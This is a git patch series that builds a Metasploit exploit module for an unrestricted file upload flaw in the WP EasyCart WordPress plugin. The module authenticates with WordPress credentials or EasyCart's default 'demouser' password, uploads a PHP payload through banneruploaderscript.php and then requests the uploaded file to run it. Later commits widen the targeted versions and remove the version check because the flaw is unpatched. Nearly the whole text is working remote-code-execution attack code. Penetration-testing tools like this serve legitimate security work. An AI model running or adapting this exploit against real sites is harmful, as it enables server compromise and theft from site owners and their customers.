From ea37e2e1980661c0359e7850de9a45494ef0afde Mon Sep 17 00:00:00 2001 From: rastating Date: Sat, 10 Jan 2015 21:05:02 +0000 Subject: [PATCH 1/9] Add WP EasyCart file upload exploit module --- .../wp_easycart_unrestricted_file_upload.rb | 109 ++++++++++++++++++ 1 file changed, 109 insertions(+) create mode 100644 modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb new file mode 100644 index 0000000000..21ea5aba01 --- /dev/null +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -0,0 +1,109 @@ +## +# This module requires Metasploit: http://www.metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FileDropper + include Msf::HTTP::Wordpress + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'WordPress WP EasyCart 3.0.4 Unrestricted File Upload', + 'Description' => %q{WordPress Shopping Cart (WP EasyCart) Plugin for + WordPress contains a flaw that allows a remote + attacker to execute arbitrary PHP code. This + flaw exists because the + /inc/amfphp/administration/banneruploaderscript.php + script does not properly verify or sanitize + user-uploaded files. By uploading a .php file, + the remote system will place the file in a + user-accessible path. Making a direct request to + the uploaded file will allow the attacker to + execute the script with the privileges of the web + server.}, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Kacper Szurek', # Vulnerability disclosure + 'Rob Carr ' # Metasploit module + ], + 'References' => + [ + ['OSVDB', '116806'], + ['WPVDB', '7745'] + ], + 'DisclosureDate' => 'Jan 08 2015', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['wp-easycart < 3.0.5', {}]], + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('USERNAME', [true, 'The username to authenticate with']), + OptString.new('PASSWORD', [true, 'The password to authenticate with']) + ], self.class) + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def check + check_plugin_version_from_readme('wp-easycart', '3.0.5') + end + + def generate_mime_message(payload, name) + data = Rex::MIME::Message.new + data.add_part('1', nil, nil, 'form-data; name="datemd5"') + data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"") + data + end + + def exploit + print_status("#{peer} - Authenticating using #{username}:#{password}...") + cookie = wordpress_login(username, password) + fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? + print_good("#{peer} - Authenticated with WordPress") + + print_status("#{peer} - Preparing payload...") + payload_name = Rex::Text.rand_text_alpha(10) + plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart') + uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php') + payload_url = normalize_uri(plugin_url, 'products', 'banners', "#{payload_name}_1.php") + data = generate_mime_message(payload, "#{payload_name}.php") + + print_status("#{peer} - Uploading payload to #{payload_url}") + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uploader_url, + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data.to_s, + 'cookie' => cookie + ) + + fail_with(Failure::Unreachable, 'No response from the target') if res.nil? + vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200 + print_good("#{peer} - Uploaded the payload") + + print_status("#{peer} - Executing the payload...") + register_files_for_cleanup("#{payload_name}_1.php") + send_request_cgi( + { + 'uri' => payload_url, + 'method' => 'GET' + }, 5) + print_good("#{peer} - Executed payload") + end +end From e6f6acece9be0d7551c98f288451d74110aed49f Mon Sep 17 00:00:00 2001 From: rastating Date: Mon, 12 Jan 2015 21:21:50 +0000 Subject: [PATCH 2/9] Add a date hash to the post data --- .../webapp/wp_easycart_unrestricted_file_upload.rb | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 21ea5aba01..244aa5ea7c 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -4,6 +4,7 @@ ## require 'msf/core' +require 'digest/md5' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking @@ -64,9 +65,9 @@ class Metasploit3 < Msf::Exploit::Remote check_plugin_version_from_readme('wp-easycart', '3.0.5') end - def generate_mime_message(payload, name) + def generate_mime_message(payload, date_hash, name) data = Rex::MIME::Message.new - data.add_part('1', nil, nil, 'form-data; name="datemd5"') + data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"') data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"") data end @@ -79,10 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Preparing payload...") payload_name = Rex::Text.rand_text_alpha(10) + date_hash = Digest::MD5.hexdigest(Time.now.to_s) plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart') uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php') - payload_url = normalize_uri(plugin_url, 'products', 'banners', "#{payload_name}_1.php") - data = generate_mime_message(payload, "#{payload_name}.php") + payload_url = normalize_uri(plugin_url, 'products', 'banners', "#{payload_name}_#{date_hash}.php") + data = generate_mime_message(payload, date_hash, "#{payload_name}.php") print_status("#{peer} - Uploading payload to #{payload_url}") res = send_request_cgi( @@ -98,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote print_good("#{peer} - Uploaded the payload") print_status("#{peer} - Executing the payload...") - register_files_for_cleanup("#{payload_name}_1.php") + register_files_for_cleanup("#{payload_name}_#{date_hash}.php") send_request_cgi( { 'uri' => payload_url, From 8246f4e0bb3d6306a8fb72d73de67a3a2fbb4830 Mon Sep 17 00:00:00 2001 From: rastating Date: Mon, 12 Jan 2015 23:30:59 +0000 Subject: [PATCH 3/9] Add ability to use both WP and EC attack vectors --- .../wp_easycart_unrestricted_file_upload.rb | 88 +++++++++++++++---- 1 file changed, 73 insertions(+), 15 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 244aa5ea7c..a2bfe26f74 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -27,7 +27,15 @@ class Metasploit3 < Msf::Exploit::Remote user-accessible path. Making a direct request to the uploaded file will allow the attacker to execute the script with the privileges of the web - server.}, + server. + + In versions <= 3.0.8 authentication can be done by + using the WordPress credentials of a user with any + role. In later versions, a valid EasyCart admin + password will be required that is in use by any + admin user. A default installation of EasyCart will + setup a user called "demouser" with a preset password + of "demouser".}, 'License' => MSF_LICENSE, 'Author' => [ @@ -42,14 +50,16 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jan 08 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Targets' => [['wp-easycart < 3.0.5', {}]], + 'Targets' => [['wp-easycart < 3.0.16', {}]], 'DefaultTarget' => 0 )) register_options( [ - OptString.new('USERNAME', [true, 'The username to authenticate with']), - OptString.new('PASSWORD', [true, 'The password to authenticate with']) + OptString.new('USERNAME', [false, 'The WordPress username to authenticate with (versions <= 3.0.8)']), + OptString.new('PASSWORD', [false, 'The WordPress password to authenticate with (versions <= 3.0.8)']), + OptString.new('EC_PASSWORD', [false, 'The EasyCart password to authenticate with (versions <= 3.0.15)', 'demouser']), + OptBool.new('EC_PASSWORD_IS_HASH', [false, 'Indicates whether or not EC_PASSWORD is an MD5 hash', false]) ], self.class) end @@ -61,22 +71,66 @@ class Metasploit3 < Msf::Exploit::Remote datastore['PASSWORD'] end - def check - check_plugin_version_from_readme('wp-easycart', '3.0.5') + def ec_password + datastore['EC_PASSWORD'] end - def generate_mime_message(payload, date_hash, name) + def ec_password_is_hash + datastore['EC_PASSWORD_IS_HASH'] + end + + def use_wordpress_authentication + username.to_s != '' && password.to_s != '' + end + + def use_ec_authentication + ec_password.to_s != '' + end + + def req_id + if ec_password_is_hash + return ec_password + else + return Digest::MD5.hexdigest(ec_password) + end + end + + def check + check_plugin_version_from_readme('wp-easycart', '3.0.16') + end + + def generate_mime_message(payload, date_hash, name, include_req_id) data = Rex::MIME::Message.new data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"') data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"") + data.add_part(req_id, nil, nil, 'form-data; name="reqID"') if include_req_id data end def exploit - print_status("#{peer} - Authenticating using #{username}:#{password}...") - cookie = wordpress_login(username, password) - fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + if !use_wordpress_authentication && !use_ec_authentication + fail_with(Failure::BadConfig, 'You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value') + end + + vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication + vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication + + if use_wordpress_authentication && use_ec_authentication + print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...") + end + + if use_wordpress_authentication + print_status("#{peer} - Authenticating using #{username}:#{password}...") + cookie = wordpress_login(username, password) + + if use_ec_authentication + print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") if cookie.nil? + else + fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? + end + + print_good("#{peer} - Authenticated with WordPress") unless cookie.nil? + end print_status("#{peer} - Preparing payload...") payload_name = Rex::Text.rand_text_alpha(10) @@ -84,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart') uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php') payload_url = normalize_uri(plugin_url, 'products', 'banners', "#{payload_name}_#{date_hash}.php") - data = generate_mime_message(payload, date_hash, "#{payload_name}.php") + data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication) print_status("#{peer} - Uploading payload to #{payload_url}") res = send_request_cgi( @@ -97,15 +151,19 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response from the target') if res.nil? vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200 - print_good("#{peer} - Uploaded the payload") print_status("#{peer} - Executing the payload...") register_files_for_cleanup("#{payload_name}_#{date_hash}.php") - send_request_cgi( + res = send_request_cgi( { 'uri' => payload_url, 'method' => 'GET' }, 5) - print_good("#{peer} - Executed payload") + + if !res.nil? && res.code == 404 + print_error("#{peer} - Failed to upload the payload") + else + print_good("#{peer} - Executed payload") + end end end From 8a89b3be28d94321271b925f8423f8508f0fed6e Mon Sep 17 00:00:00 2001 From: rastating Date: Tue, 13 Jan 2015 22:20:40 +0000 Subject: [PATCH 4/9] Cleanup of various bits of code --- .../wp_easycart_unrestricted_file_upload.rb | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index a2bfe26f74..3a19dd6c9c 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -4,7 +4,6 @@ ## require 'msf/core' -require 'digest/md5' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking @@ -91,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote if ec_password_is_hash return ec_password else - return Digest::MD5.hexdigest(ec_password) + return Rex::Text.md5(ec_password) end end @@ -107,11 +106,15 @@ class Metasploit3 < Msf::Exploit::Remote data end - def exploit + def setup if !use_wordpress_authentication && !use_ec_authentication fail_with(Failure::BadConfig, 'You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value') end + super + end + + def exploit vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication @@ -134,10 +137,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Preparing payload...") payload_name = Rex::Text.rand_text_alpha(10) - date_hash = Digest::MD5.hexdigest(Time.now.to_s) + date_hash = Rex::Text.md5(Time.now.to_s) + uploaded_filename = "#{payload_name}_#{date_hash}.php" plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart') uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php') - payload_url = normalize_uri(plugin_url, 'products', 'banners', "#{payload_name}_#{date_hash}.php") + payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename) data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication) print_status("#{peer} - Uploading payload to #{payload_url}") @@ -153,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200 print_status("#{peer} - Executing the payload...") - register_files_for_cleanup("#{payload_name}_#{date_hash}.php") + register_files_for_cleanup(uploaded_filename) res = send_request_cgi( { 'uri' => payload_url, From 9d3397901bd1dd0d651a72f8a20106169baae757 Mon Sep 17 00:00:00 2001 From: rastating Date: Mon, 19 Jan 2015 20:59:46 +0000 Subject: [PATCH 5/9] Correct version numbers and code tidy up --- .../wp_easycart_unrestricted_file_upload.rb | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 3a19dd6c9c..8dee9128fa 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info( info, - 'Name' => 'WordPress WP EasyCart 3.0.4 Unrestricted File Upload', + 'Name' => 'WordPress WP EasyCart Unrestricted File Upload', 'Description' => %q{WordPress Shopping Cart (WP EasyCart) Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jan 08 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Targets' => [['wp-easycart < 3.0.16', {}]], + 'Targets' => [['wp-easycart < 3.0.17', {}]], 'DefaultTarget' => 0 )) @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - check_plugin_version_from_readme('wp-easycart', '3.0.16') + check_plugin_version_from_readme('wp-easycart', '3.0.17') end def generate_mime_message(payload, date_hash, name, include_req_id) @@ -126,13 +126,15 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Authenticating using #{username}:#{password}...") cookie = wordpress_login(username, password) - if use_ec_authentication - print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") if cookie.nil? + if !cookie + if use_ec_authentication + print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") + else + fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') + end else - fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? + print_good("#{peer} - Authenticated with WordPress") end - - print_good("#{peer} - Authenticated with WordPress") unless cookie.nil? end print_status("#{peer} - Preparing payload...") From 345d5c5c0828a77e37093d586b8fe71b5a89c502 Mon Sep 17 00:00:00 2001 From: rastating Date: Sat, 7 Feb 2015 19:09:16 +0000 Subject: [PATCH 6/9] Update version numbers to reflect latest release --- .../unix/webapp/wp_easycart_unrestricted_file_upload.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 8dee9128fa..0063e0c81c 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jan 08 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Targets' => [['wp-easycart < 3.0.17', {}]], + 'Targets' => [['wp-easycart < 3.0.19', {}]], 'DefaultTarget' => 0 )) @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - check_plugin_version_from_readme('wp-easycart', '3.0.17') + check_plugin_version_from_readme('wp-easycart', '3.0.19') end def generate_mime_message(payload, date_hash, name, include_req_id) From 56d2bc5adb607ff6a8a6920fd9c25b3d1e9a5c51 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 7 Feb 2015 23:22:43 +0100 Subject: [PATCH 7/9] correct version number --- .../unix/webapp/wp_easycart_unrestricted_file_upload.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 0063e0c81c..ba8271eede 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote [ OptString.new('USERNAME', [false, 'The WordPress username to authenticate with (versions <= 3.0.8)']), OptString.new('PASSWORD', [false, 'The WordPress password to authenticate with (versions <= 3.0.8)']), - OptString.new('EC_PASSWORD', [false, 'The EasyCart password to authenticate with (versions <= 3.0.15)', 'demouser']), + OptString.new('EC_PASSWORD', [false, 'The EasyCart password to authenticate with (versions <= 3.0.19)', 'demouser']), OptBool.new('EC_PASSWORD_IS_HASH', [false, 'Indicates whether or not EC_PASSWORD is an MD5 hash', false]) ], self.class) end From d2421a2d75995af9e730913c6f2868ccca6a97a4 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 7 Feb 2015 23:34:19 +0100 Subject: [PATCH 8/9] wrong version --- .../unix/webapp/wp_easycart_unrestricted_file_upload.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index ba8271eede..3dcd2c070a 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote [ OptString.new('USERNAME', [false, 'The WordPress username to authenticate with (versions <= 3.0.8)']), OptString.new('PASSWORD', [false, 'The WordPress password to authenticate with (versions <= 3.0.8)']), - OptString.new('EC_PASSWORD', [false, 'The EasyCart password to authenticate with (versions <= 3.0.19)', 'demouser']), + OptString.new('EC_PASSWORD', [false, 'The EasyCart password to authenticate with (versions <= 3.0.18)', 'demouser']), OptBool.new('EC_PASSWORD_IS_HASH', [false, 'Indicates whether or not EC_PASSWORD is an MD5 hash', false]) ], self.class) end From f2b834cebe1eba96e61b7ec8a2ee7080e49a734c Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 7 Feb 2015 23:38:44 +0100 Subject: [PATCH 9/9] remove check because the vuln is unpatched --- .../unix/webapp/wp_easycart_unrestricted_file_upload.rb | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 3dcd2c070a..dfe47d01be 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jan 08 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Targets' => [['wp-easycart < 3.0.19', {}]], + 'Targets' => [['wp-easycart', {}]], 'DefaultTarget' => 0 )) @@ -94,10 +94,6 @@ class Metasploit3 < Msf::Exploit::Remote end end - def check - check_plugin_version_from_readme('wp-easycart', '3.0.19') - end - def generate_mime_message(payload, date_hash, name, include_req_id) data = Rex::MIME::Message.new data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"')